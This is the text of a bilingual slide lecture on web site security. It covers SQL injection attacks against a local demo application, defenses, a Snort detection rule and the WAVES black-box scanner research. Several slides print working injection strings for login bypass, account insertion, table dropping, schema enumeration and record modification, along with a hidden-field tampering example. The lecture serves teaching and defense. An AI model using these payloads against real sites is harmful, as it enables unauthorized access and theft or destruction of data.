Web site security Part 1 : SQL Injection

1. Web site securityPart 1 : SQL Injection Reporter : James Chen

2. Outline • Web site security • SQL Injection overview • Web application security scanner (WSS) overview • SQL injection detection • Security assessment tool

3. Web site security • SQL injection • Cross site scripting • Directory traversal • Authentication • Parameter manipulation

4. SQL injection • SQL injection is a hacking technique which attempts to pass SQL commands through a web application for execution by a backend database. • Hackers exploit the possibility of chained SQL commands with user-provided parameters, and then embed SQL commands inside these parameters. • Using this method, a web application which is open to a SQL injection attack allows a hacker to execute arbitrary SQL queries and/or commands on the backend database server through the web application.

5. Cross site scripting attack • Cross-site scripting is gaining popularity among attackers as an easy vulnerability to find in web sites and exploit. The threats of cross-site scripting: • Users can unknowingly execute malicious scripts when viewing dynamically generated pages based on content provided by an attacker. • An attacker can take over the user session before the user's session cookie expires. • An attacker can connect users to a malicious server of the attacker's choice. • An attacker can supply a user with a URL and convince that user to access it, which would enable the attacker to cause his own choice of script or HTML to be executed in the user's browser. Using this technique, an attacker can take actions using the privileges of the user who accessed the URL, such as issuing queries on the underlying SQL databases and viewing the results, and exploiting known faulty implementations on the target system.

6. Directory traversal attacks • In a directory traversal attack, hackers supply a specially crafted filename to a program (usually a server) that allows them to access files in areas of the file system that should be unavailable.

7. Parameter manipulation • Parameter manipulation targets the business logic and can be used if the programmer has relied on hidden or fixed fields as the main security measure (for example, a hidden tag in a form or a parameter in a URL). Hackers can then modify these parameters to bypass the security

8. Authentication attacks • An authentication attack is a brute force attack on a web application that requires authentication. A range of user names and passwords are attempted in order to attempt authentication.

9. SQL Injection overview • SQL Injection攻擊模式 • 入侵登入畫面 • 植入帳號 • 刪除資料表 • 偷取資料表資訊 • 修改資料表記錄

10. 入侵登入畫面 欲執行的SQL敘述 SELECT count(*) FROM Members WHERE UserName = 'John' AND Password ='ABC'

11. 直接入侵 • 不良的SQL敘述寫法 SELECT count(*) FROM Members WHERE UserName ='" & _ txtUserName.Text & "' AND Password ='" & _ txtPassword.Text & "'“ • 在[帳號]欄位輸入以下的資料就可以登入成功: ' OR 1=1— • 程式所執行的SQL敘述變成: SELECT count(*) FROM Members WHERE UserName = '' OR 1=1 – And Password = ''

12. 植入帳號與刪除資料表 • 在[帳號]欄位輸入以下的資料就可以新增駭客帳號: ';insert into Members(UserName, Password) Values ('hacker', 'foo')— • 權限足夠的狀況下, 在[帳號]欄位輸入以下的資料就可以刪除Members資料表: ';drop table Members --

13. 不需要密碼也可以登入 • 在[密碼]欄位輸入以下的資料就可以成功登入: aaa' Or UserName Like '% • 程式所執行的SQL敘述變成: SELECT count(*) FROM Members WHERE UserName = '' And Password = 'aaa' Or UserName Like '%'

14. 利用Url傳遞網頁執行需要的參數 http://localhost/GoodSupplierProduct/Products.aspx?SupplierID=1

15. 不良的程式寫法 • Dim strSQL As String = “SELECT * FROM Products WHERE Supplierid=” & _Request("SupplierID").ToString()

16. 查詢SQL Server的版本 • 在網址列輸入: http://localhost/BadSupplierProduct/Products.aspx?SupplierID=9999 union all select null, @@ServiceName, null, null, @@version, null, null, null, null, null

17. 讀取資料庫的資料表 • 在網址列輸入: http://localhost/BadSupplierProduct/Products.aspx?SupplierID=9999 union all select null, name, null, null, null, null,null,null,null,null fromsysobjects where xtype='u' 資 料 表 名 稱

18. 讀取資料表的欄位 • 在網址列輸入:http://localhost/BadSupplierProduct/Products.aspx?SupplierID=9999 union all select null,name,null,null,null,null,null,null,null,null from syscolumns where id=object_id('Products') and colid=1 欄 位 名 稱

19. 修改資料表記錄 • 在網址列輸入:http://localhost/BadSupplierProduct/Products.aspx?SupplierID=9999;update Products set UnitPrice=1 Where ProductID=1

20. 防堵SQL Injection攻擊的基本原則(一) • 將使用者輸入資料當做參數傳給SQL敘述或Stored Procedure • SQL敘述或是Stored Procedure中使用EXEC敘述執行使用者輸入的內容需更進一步防範 • 如果無法將使用者輸入資料當做參數傳給SQL敘述或Stored Procedure • 使用Regular Expression驗証使用者輸入的資料的格式 • 限制使用者輸入的資料的長度 • 限制使用者登入資料庫的帳號的權限 • 去除使用者輸入資料中的“--”(SQL敘述的註解) • 將使用者輸入的單引號置換成雙引號

21. 將使用者輸入的單引號置換成雙引號的效果 • 例如原本欲執行的SQL敘述為: Select count(*) from Members where UserName='John' And Password='ABC' • 使用者在UserName欄位輸入[' Or 1=1 -- ] • 未將使用者輸入的單引號置換成雙引號, 上述的SQL敘述執行的結果為Members資料表的總筆數 • 將使用者輸入的單引號置換成雙引號, 上述的SQL敘述執行的結果為0

22. 防堵SQL Injection攻擊的基本原則(二) • 限制應用程式或網頁只能擁有執行Stored Procedure的權限, 不能直接存取資料庫中的Table和View • 使用[Windows整合安全模式]登入資料庫, 避免使用系統管理員身份登入資料庫 • 設定TextBox欄位的MaxLength屬性 • 加強對資料庫操作的稽核

23. Hidden Field Tampering攻擊法 • Hidden Field Tampering攻擊模式 • 把HTML Form存到硬碟 • 竄改Hidden欄位的內容值 • 將竄改過的Form重送到Web Server

24. BadMotor.com • 使用隱藏欄位在網頁中傳遞資料

25. 隱藏欄位中的資料被竄改的情形 • 檢視帶有隱藏欄位的網頁的[原始檔] • 另存新HTML檔案 • 修改存檔內容 <form name=“Form1” method=“post” action=“http://IP位址/BadMotor/Confirm.aspx?MotorID=1” id=“Form1”> … <input name="HiddenPrice" id="HiddenPrice" type="hidden" value="1000000" /> … </form> • 使用IE開啟另存的HTML檔案 • 執行Submit 竄改成

26. Web application security scanner (WSS) overview WSSs operate according to three constraints: 1. Neither documentation nor source code will be available for the target Web application. 2. Interactions with the target Web applications and observations of their behaviors will be done through their public interfaces. 3. The testing process must be automated and testing a new target system should not require extensive human participation in test case generation.

27. SQL injection detection • Typical validation procedure • Anti-SQL-Injection.php • To take the popular open-source IDS Snort • Black-box approach

28. Typical validation procedure • If Length(strUserName )< 3  OR Length(strUserName) > 20 Then OutputError(“Invalid User Name”) Else If Length(strPassword <6) OR Length(strPassword) > 11 Then OutputError(“Invalid Password”) Else Begin SQLQuery = “SELECT * FROM Users WHERE UserName='” + strUserName + “AND Password='” + strPassword + “';” If GetQueryResult(SQLQuery) = 0 Then bAuthenticated = false; Else bAuthenticated = true; End;

29. Anti-SQL-Injection.php <? function anti_injection($sql) { // remove palavras que contenham sintaxe sql $sql = preg_replace(sql_regcase("/(from|select|insert|delete|where|drop table|show tables|#|\*|--|\\\\)/"),"",$sql); $sql = trim($sql);//limpa espacos vazio $sql = strip_tags($sql);//tira tags html e php $sql = addslashes($sql);//Adiciona barras invertidas a uma string return $sql; } //modo de usar pegando dados vindos do formulario $nome = anti_injection($_POST["nome"]); $senha = anti_injection($_POST["senha"]); ?>

30. To take the popular open-source IDS Snort • Detection of SQL Injection and Cross-site Scripting Attacks by K.K. Mookhey and Nilesh Burghate , URL: http://www.securityfocus.com/infocus/1768/ • To take the popular open-source IDS Snort, and compose regular-expression based rules for detecting SQL Injection and Cross-site Scripting Attacks. • To avoid high number of flase positive, the signatures can be midified. • Regex for detection of SQL meta-characters • /(\%27)|(\')|(\-\-)|(\%23)|(#)/ix </TD< tr> • To detect either the hex equivalent of the single-quote, the single-quote itself or the presence of the double-dash. • The above regular expression would be added into a new Snort rule as follows: • alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection - Paranoid"; flow:to_server,established;uricontent:".pl";pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; classtype:Web-application-attack; sid:9099; rev:5;) </TD< tr>

31. Black-box approach • Huang, Y. W., Huang, S. K., Lin, T. P., Tsai, C. H. “Web Application Security Assessment by Fault Injection and Behavior Monitoring.” In Proc. 12th Int’l World Wide Web Conference, p.148-159, Budapest, Hungary, 2003. • To develope WAVES—a testing platform for remote, black-box testing of Web application security. • Adopting a black-box approach in order to analyze Web applications externally without the aid of source code. • Using crawler to discover all pages in a Web site that contain HTML forms, since forms are the primary data entry points in most Web applications.

32. Black-box approach (cont.) • During the reverse engineering process, HTML pages are parsed with a Document Object Model (DOM) parser, and HTML forms are parsed and stored in XML format. • An attempt was made to inject malicious SQL patterns into the server-side program that processes the form’s input. We referenced the existing literature on SQL injection techniques to create a set of SQL injection patterns. • If the server-side program detects and filters malicious patterns, or if the filtering mechanism is provided on a global scale, then injection will fail.

33. SQL injection detection • Complete crawling • Bypass the validation procedure • Test set generation and output analysis • Injection patterns and error messages

34. Complete crawling • “Complete crawling” mechanism to attempt more complete crawl, that is, all data entry points must be correctly identified. • To look at ways that HTML pages reveal the existence of other pages or entry points. • A ‘‘deep injection’’ mechanism to eliminate these types of false negatives.

35. HTML pages reveal the existence of other pages or entry Points

36. Bypass the validation procedure • The Topic Model • The Injection Knowledge Manager (IKM)

37. Injection Knowledge Manager (IKM) • IKM must decide not only on which variable to place the injection pattern, but also how to fill other variables with potentially valid data

38. Bypass the validation procedure • Using injection Knowledge Manager (IKM) • Only query (and not browsing) interfaces are provided, these types of document repositories cannot be indexed by current crawling technologies.

39. Test set generation and output analysis • Using our KB, The IKM implements four algorithms Get_Topic(), Get_Value(), Expand_Values() and Feedback(). • Get_Topic(^t) :checks whether a topic can be associated with^t. • Get_Value() to retrieve the best possible guess, where^t is the term (variable name or descriptive keyword) associated with the text box. • Expand_Values() :expands the knowledge base. • Feedback():If injection secceed , save input value.

40. Expand_Values() example • The topic Company, STerm_Company = {“Company,“ “Firm”} • SValue_Company = {“IBM,” “HP,” “Sun,” “Lucent,” “Cisco”}. • input variable “Affiliation” that is associated with SValue_Input = {“HP,” “Lucent,” “Cisco,” “Dell”}. • The crawler calls Expand_Values() with “Affiliation” and SValue_Input. • After failing to find anearest term for “Affiliation,” the Knowledge Manager notes that SValue_Company is very close to SValue_Input, and inserts the term “Affiliation” into STerm_Company and the value SValue_Input - SValue_Company = {“Dell”} into SValue_Company. • Both STerm_Company and SValue_Company are expanded.

41. Injection patterns and error messages • WAVES injection patterns are crafted not to intrude a vulnerable entry point (e.g., executing a SQL command), but to make it output database error messages. • If an entry point outputs database error messages in response to a particular injection pattern, it is vulnerable to that pattern. • We search for a particular string in an HTML output to detect database error messages.

42. WAVES injection patterns

43. Database error messages

44. Output analysis • Negative Response Extraction (NRE) algorithm. • If an initial injection fails, the returned page is saved as R1. • The crawler then sends an intentionally invalid request to the targeted Web application–for instance, a random 50-character string for the UserName variable. The returned page is retrieved and saved as R2. • Finally, the crawler sends to the Web application a request generated by the IKM with a high likelihood of validity, but without injection strings. The returned page is saved as R3.

46. WAVES’ system operation • The crawlers act as interfaces between Web applications and software testing mechanisms. • The crawlers were equipped with IE’s Document Object Model (DOM) parser and scripting engine to exhibit the same behaviors as browsers. • Events is triggered by our test cases or by Web application errors. • This is accomplished by three strategies–browser emulation, user event generation, and automated form completion.

47. System architecture of WAVES.

48. Other security assessment tool • WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.

49. Security assessment tool (cont.) • Absinthe • Absinthe is a GUI based tool designed to automate the process of blind sql injection. It works by profiling response pages as true or false from known cases, then moves on to identify unknowns as true or false.

50. Absinthe